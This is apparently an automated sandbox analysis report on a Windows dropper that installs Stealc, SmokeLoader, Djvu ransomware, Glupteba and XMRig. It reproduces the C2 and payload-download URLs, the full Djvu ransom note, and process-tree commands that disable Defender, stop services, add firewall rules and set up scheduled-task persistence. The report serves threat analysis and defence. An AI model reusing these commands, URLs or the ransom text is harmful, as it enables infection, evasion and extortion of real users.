Analysis

  • max time kernel
    71s
  • max time network
    151s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    24/01/2024, 13:39

General

  • Target

    file.exe

  • Size

    9.3MB

  • MD5

    aca54a0ddb87930dc31fe9123c46d76d

  • SHA1

    ea2b2453cdff42d802117ab302028c9614a83a43

  • SHA256

    9587bda655a2dc730e4bdbd7de5ab39bc37de697fe22f449a6b2f851adaedfb8

  • SHA512

    0ce4c6283f9112413e247d3dc79e033afa90321f55f36eb9cb1b38f051987ca3b9c808c5b323112fefe702cb56c90a0006421a2ec46e343e4d1c04ecf63aa44e

  • SSDEEP

    196608:Zlzk48Er+gQjoW4fsySabpuYf8GLgB4cmNYqp5eiQt1Cz7Zy:ZKPgAEUy5bpjrLg7mia5JQt1C5

Malware Config

Extracted

Family

stealc

C2

http://185.172.128.79

Attributes
  • url_path

    /3886d2276�6914c4.php

rc4.plain

Extracted

Family

smokeloader

Botnet

pub1

Extracted

Family

smokeloader

Version

2022

C2

http://trad-einmyus.com/index.php

http://tradein-myus.com/index.php

http://trade-inmyus.com/index.php

rc4.i32
rc4.i32

Extracted

Family

djvu

C2

http://habrafa.com/test1/get.php

Attributes
  • extension

    .cdpo

  • offline_id

    Bn3q97hwLouKbhkQRNO4SeV07gjdEQVm8NKhg0t1

  • payload_url

    http://brusuax.com/dl/build2.exe

    http://habrafa.com/files/1/build3.exe

  • ransomnote

    ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-FCWSCsjEWS Price of private key and decrypt software is $1999. Discount 50% available if you contact us first 72 hours, that's price for you is $999. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: [email protected] Reserve e-mail address to contact us: [email protected] Your personal ID: 0844OSkw

rsa_pubkey.plain

Signatures

  • DcRat

    DarkCrystal(DC) is a new .NET RAT active since June 2019 capable of loading additional plugins.

  • Detected Djvu ransomware 4 IoCs
  • Djvu Ransomware

    Ransomware which is a variant of the STOP family.

  • Glupteba

    Glupteba is a modular loader written in Golang with various components.

  • Glupteba payload 8 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Stealc

    Stealc is an infostealer written in C++.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 5 IoCs
  • Creates new service(s) 1 TTPs
  • Downloads MZ/PE file
  • Modifies Installed Components in the registry 2 TTPs 2 IoCs
  • Modifies Windows Firewall 1 TTPs 1 IoCs
  • Stops running service(s) 3 TTPs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 21 IoCs
  • Loads dropped DLL 4 IoCs
  • Modifies file permissions 1 TTPs 1 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 18 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 3 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates connected drives 3 TTPs 4 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Manipulates WinMonFS driver. 1 IoCs

    Roottkits write to WinMonFS to hide directories/files from being detected.

  • Drops file in System32 directory 11 IoCs
  • Suspicious use of SetThreadContext 5 IoCs
  • Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs

    Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

  • Drops file in Windows directory 4 IoCs
  • Launches sc.exe 15 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 55 IoCs
  • Checks SCSI registry key(s) 3 TTPs 64 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies registry class 21 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 32 IoCs
  • Suspicious use of SendNotifyMessage 22 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\file.exe
    "C:\Users\Admin\AppData\Local\Temp\file.exe"
    1⤵
      PID:4440
      • C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe
        "C:\Users\Admin\AppData\Local\Temp\InstallSetup7.exe"
        2⤵
        • Executes dropped EXE
        • Loads dropped DLL
        • Suspicious use of WriteProcessMemory
        PID:3180
        • C:\Users\Admin\AppData\Local\Temp\nsx4C5D.tmp
          C:\Users\Admin\AppData\Local\Temp\nsx4C5D.tmp
          3⤵
          • Checks computer location settings
          • Executes dropped EXE
          • Loads dropped DLL
          • Checks processor information in registry
          • Suspicious behavior: EnumeratesProcesses
          PID:4128
          • C:\Windows\SysWOW64\WerFault.exe
            C:\Windows\SysWOW64\WerFault.exe -u -p 4128 -s 2372
            4⤵
            • Program crash
            PID:4632
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /c timeout /t 5 & del /f /q "C:\Users\Admin\AppData\Local\Temp\nsx4C5D.tmp" & del "C:\ProgramData\*.dll"" & exit
            4⤵
              PID:3288
          • C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
            C:\Users\Admin\AppData\Local\Temp\BroomSetup.exe
            3⤵
            • Executes dropped EXE
            • Suspicious use of SetWindowsHookEx
            • Suspicious use of WriteProcessMemory
            PID:1796
            • C:\Windows\SysWOW64\cmd.exe
              C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\Temp\Task.bat" "
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:3084
              • C:\Windows\SysWOW64\chcp.com
                chcp 1251
                5⤵
                  PID:4492
                • C:\Windows\SysWOW64\schtasks.exe
                  schtasks /create /tn "MalayamaraUpdate" /tr "'C:\Users\Admin\AppData\Local\Temp\Updater.exe'" /sc minute /mo 30 /F
                  5⤵
                  • Creates scheduled task(s)
                  PID:3384
          • C:\Users\Admin\AppData\Local\Temp\toolspub1.exe
            "C:\Users\Admin\AppData\Local\Temp\toolspub1.exe"
            2⤵
            • Executes dropped EXE
            • Checks SCSI registry key(s)
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: MapViewOfSection
            PID:1044
          • C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
            "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
            2⤵
            • Executes dropped EXE
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:1968
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 372
              3⤵
              • Program crash
              PID:3296
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 388
              3⤵
              • Program crash
              PID:4268
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 420
              3⤵
              • Program crash
              PID:1124
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 676
              3⤵
              • Program crash
              PID:3616
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 688
              3⤵
              • Program crash
              PID:4080
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 744
              3⤵
              • Program crash
              PID:1184
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 748
              3⤵
              • Program crash
              PID:3776
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 688
              3⤵
              • Program crash
              PID:3552
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 776
              3⤵
              • Program crash
              PID:444
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 636
              3⤵
              • Program crash
              PID:3544
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 908
              3⤵
              • Program crash
              PID:3160
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 900
              3⤵
              • Program crash
              PID:1640
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 996
              3⤵
              • Program crash
              PID:4132
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 772
              3⤵
              • Program crash
              PID:4620
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 924
              3⤵
              • Program crash
              PID:932
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 852
              3⤵
              • Program crash
              PID:1144
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 856
              3⤵
              • Program crash
              PID:4488
            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
              powershell -nologo -noprofile
              3⤵
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:3728
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 980
              3⤵
              • Program crash
              PID:4752
            • C:\Windows\SysWOW64\WerFault.exe
              C:\Windows\SysWOW64\WerFault.exe -u -p 1968 -s 616
              3⤵
              • Program crash
              PID:4660
            • C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe
              "C:\Users\Admin\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe"
              3⤵
              • Executes dropped EXE
              • Adds Run key to start application
              • Checks for VirtualBox DLLs, possible anti-VM trick
              • Drops file in Windows directory
              • Modifies data under HKEY_USERS
              • Suspicious use of WriteProcessMemory
              PID:1828
              • C:\Windows\system32\cmd.exe
                C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
                4⤵
                  PID:2416
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  4⤵
                  • Drops file in System32 directory
                  • Modifies data under HKEY_USERS
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2888
                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                  powershell -nologo -noprofile
                  4⤵
                    PID:1852
                  • C:\Windows\rss\csrss.exe
                    C:\Windows\rss\csrss.exe
                    4⤵
                    • Executes dropped EXE
                    • Adds Run key to start application
                    • Manipulates WinMonFS driver.
                    • Drops file in Windows directory
                    • Suspicious use of WriteProcessMemory
                    PID:992
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 240
                      5⤵
                      • Program crash
                      PID:3124
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 392
                      5⤵
                      • Program crash
                      PID:4488
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 612
                      5⤵
                      • Program crash
                      PID:4964
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 720
                      5⤵
                      • Program crash
                      PID:3988
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 736
                      5⤵
                      • Program crash
                      PID:4684
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 736
                      5⤵
                      • Program crash
                      PID:3232
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 760
                      5⤵
                      • Program crash
                      PID:4928
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 788
                      5⤵
                      • Program crash
                      PID:2088
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -nologo -noprofile
                      5⤵
                      • Drops file in System32 directory
                      • Modifies data under HKEY_USERS
                      • Suspicious use of AdjustPrivilegeToken
                      PID:4672
                    • C:\Windows\SysWOW64\WerFault.exe
                      C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 388
                      5⤵
                      • Program crash
                      PID:1376
                      • C:\Windows\system32\wusa.exe
                        wusa /uninstall /kb:890830 /quiet /norestart
                        6⤵
                          PID:3720
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 908
                        5⤵
                        • Program crash
                        PID:2504
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 712
                        5⤵
                        • Program crash
                        PID:5068
                      • C:\Windows\SysWOW64\WerFault.exe
                        C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 748
                        5⤵
                        • Program crash
                        PID:1360
                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        powershell -nologo -noprofile
                        5⤵
                          PID:2460
                          • C:\Windows\SysWOW64\sc.exe
                            sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)
                            6⤵
                            • Launches sc.exe
                            PID:2036
                        • C:\Windows\SYSTEM32\schtasks.exe
                          schtasks /delete /tn ScheduledUpdate /f
                          5⤵
                            PID:4476
                          • C:\Windows\SYSTEM32\schtasks.exe
                            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                            5⤵
                            • Creates scheduled task(s)
                            PID:1420
                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                            powershell -nologo -noprofile
                            5⤵
                            • Drops file in System32 directory
                            • Modifies data under HKEY_USERS
                            PID:4456
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 972
                            5⤵
                            • Program crash
                            PID:1144
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 640
                            5⤵
                            • Program crash
                            PID:4304
                          • C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
                            C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
                            5⤵
                            • Executes dropped EXE
                            PID:1264
                          • C:\Windows\SYSTEM32\schtasks.exe
                            schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
                            5⤵
                            • Creates scheduled task(s)
                            PID:3640
                          • C:\Windows\windefender.exe
                            "C:\Windows\windefender.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of WriteProcessMemory
                            PID:1864
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 900
                            5⤵
                            • Program crash
                            PID:1620
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 1128
                            5⤵
                            • Program crash
                            PID:3720
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 1160
                            5⤵
                            • Program crash
                            PID:2812
                          • C:\Windows\SysWOW64\WerFault.exe
                            C:\Windows\SysWOW64\WerFault.exe -u -p 992 -s 1088
                            5⤵
                            • Program crash
                            PID:3588
                    • C:\Users\Admin\AppData\Local\Temp\FirstZ.exe
                      "C:\Users\Admin\AppData\Local\Temp\FirstZ.exe"
                      2⤵
                      • Executes dropped EXE
                      • Drops file in System32 directory
                      PID:2832
                      • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                        C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                        3⤵
                          PID:3008
                        • C:\Windows\system32\sc.exe
                          C:\Windows\system32\sc.exe start "WSNKISKT"
                          3⤵
                          • Launches sc.exe
                          PID:620
                        • C:\Windows\system32\sc.exe
                          C:\Windows\system32\sc.exe stop eventlog
                          3⤵
                          • Launches sc.exe
                          PID:3320
                        • C:\Windows\system32\sc.exe
                          C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                          3⤵
                          • Launches sc.exe
                          PID:3584
                        • C:\Windows\system32\sc.exe
                          C:\Windows\system32\sc.exe delete "WSNKISKT"
                          3⤵
                          • Launches sc.exe
                          PID:1548
                        • C:\Windows\system32\powercfg.exe
                          C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                          3⤵
                            PID:5112
                          • C:\Windows\system32\powercfg.exe
                            C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                            3⤵
                              PID:4048
                            • C:\Windows\system32\powercfg.exe
                              C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                              3⤵
                                PID:5088
                              • C:\Windows\system32\powercfg.exe
                                C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                3⤵
                                  PID:4648
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe stop dosvc
                                  3⤵
                                  • Launches sc.exe
                                  PID:2328
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe stop bits
                                  3⤵
                                  • Launches sc.exe
                                  PID:3776
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe stop wuauserv
                                  3⤵
                                  • Launches sc.exe
                                  PID:5056
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                  3⤵
                                  • Launches sc.exe
                                  PID:4572
                                • C:\Windows\system32\sc.exe
                                  C:\Windows\system32\sc.exe stop UsoSvc
                                  3⤵
                                  • Launches sc.exe
                                  PID:1144
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                  3⤵
                                    PID:1376
                                • C:\Users\Admin\AppData\Local\Temp\rty25.exe
                                  "C:\Users\Admin\AppData\Local\Temp\rty25.exe"
                                  2⤵
                                  • Executes dropped EXE
                                  PID:2112
                              • C:\Windows\SysWOW64\WerFault.exe
                                C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1968 -ip 1968
                                1⤵
                                  PID:4752
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1968 -ip 1968
                                  1⤵
                                    PID:4684
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 476 -p 1968 -ip 1968
                                    1⤵
                                      PID:3312
                                    • C:\Windows\SysWOW64\WerFault.exe
                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1968 -ip 1968
                                      1⤵
                                        PID:2256
                                      • C:\Windows\SysWOW64\WerFault.exe
                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1968 -ip 1968
                                        1⤵
                                          PID:4924
                                        • C:\Windows\SysWOW64\WerFault.exe
                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1968 -ip 1968
                                          1⤵
                                            PID:4460
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 1968 -ip 1968
                                            1⤵
                                              PID:3772
                                            • C:\Windows\SysWOW64\WerFault.exe
                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 1968 -ip 1968
                                              1⤵
                                                PID:2868
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1968 -ip 1968
                                                1⤵
                                                  PID:1588
                                                • C:\Windows\SysWOW64\WerFault.exe
                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 496 -p 1968 -ip 1968
                                                  1⤵
                                                    PID:2556
                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1968 -ip 1968
                                                    1⤵
                                                      PID:5076
                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 1968 -ip 1968
                                                      1⤵
                                                        PID:3444
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1968 -ip 1968
                                                        1⤵
                                                          PID:3256
                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1968 -ip 1968
                                                          1⤵
                                                            PID:3996
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1968 -ip 1968
                                                            1⤵
                                                              PID:616
                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1968 -ip 1968
                                                              1⤵
                                                                PID:2008
                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1968 -ip 1968
                                                                1⤵
                                                                  PID:4104
                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 552 -p 1968 -ip 1968
                                                                  1⤵
                                                                    PID:1940
                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 1968 -ip 1968
                                                                    1⤵
                                                                      PID:432
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 336
                                                                      1⤵
                                                                      • Program crash
                                                                      PID:2016
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 352
                                                                      1⤵
                                                                      • Program crash
                                                                      PID:3124
                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1828 -ip 1828
                                                                      1⤵
                                                                        PID:1788
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 584
                                                                        1⤵
                                                                        • Program crash
                                                                        PID:3996
                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 404 -p 1828 -ip 1828
                                                                        1⤵
                                                                          PID:2036
                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 1828 -ip 1828
                                                                          1⤵
                                                                            PID:1376
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 708
                                                                            1⤵
                                                                            • Program crash
                                                                            PID:2700
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 704
                                                                            1⤵
                                                                            • Program crash
                                                                            PID:1156
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 740
                                                                            1⤵
                                                                            • Program crash
                                                                            PID:436
                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 1828 -ip 1828
                                                                            1⤵
                                                                              PID:5068
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 736
                                                                              1⤵
                                                                              • Program crash
                                                                              PID:3364
                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 1828 -ip 1828
                                                                              1⤵
                                                                                PID:4440
                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 1828 -ip 1828
                                                                                1⤵
                                                                                  PID:312
                                                                                • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  powershell -nologo -noprofile
                                                                                  1⤵
                                                                                  • Drops file in System32 directory
                                                                                  • Modifies data under HKEY_USERS
                                                                                  • Suspicious behavior: EnumeratesProcesses
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3172
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 688
                                                                                  1⤵
                                                                                  • Program crash
                                                                                  PID:2680
                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 1828 -ip 1828
                                                                                  1⤵
                                                                                    PID:4660
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -u -p 1828 -s 352
                                                                                    1⤵
                                                                                    • Program crash
                                                                                    PID:868
                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 1828 -ip 1828
                                                                                    1⤵
                                                                                      PID:1420
                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 1828 -ip 1828
                                                                                      1⤵
                                                                                        PID:4356
                                                                                      • C:\Windows\system32\netsh.exe
                                                                                        netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
                                                                                        1⤵
                                                                                        • Modifies Windows Firewall
                                                                                        PID:4660
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 992 -ip 992
                                                                                        1⤵
                                                                                          PID:5112
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 992 -ip 992
                                                                                          1⤵
                                                                                            PID:2092
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 992 -ip 992
                                                                                            1⤵
                                                                                              PID:1264
                                                                                            • C:\Windows\SysWOW64\WerFault.exe
                                                                                              C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 992 -ip 992
                                                                                              1⤵
                                                                                                PID:1916
                                                                                              • C:\Windows\SysWOW64\WerFault.exe
                                                                                                C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 992 -ip 992
                                                                                                1⤵
                                                                                                  PID:1956
                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                  C:\Windows\SysWOW64\WerFault.exe -pss -s 464 -p 992 -ip 992
                                                                                                  1⤵
                                                                                                    PID:1704
                                                                                                  • C:\Windows\SysWOW64\WerFault.exe
                                                                                                    C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 992 -ip 992
                                                                                                    1⤵
                                                                                                      PID:4104
                                                                                                    • C:\Windows\SysWOW64\WerFault.exe
                                                                                                      C:\Windows\SysWOW64\WerFault.exe -pss -s 564 -p 992 -ip 992
                                                                                                      1⤵
                                                                                                        PID:4036
                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                        C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 992 -ip 992
                                                                                                        1⤵
                                                                                                          PID:1536
                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
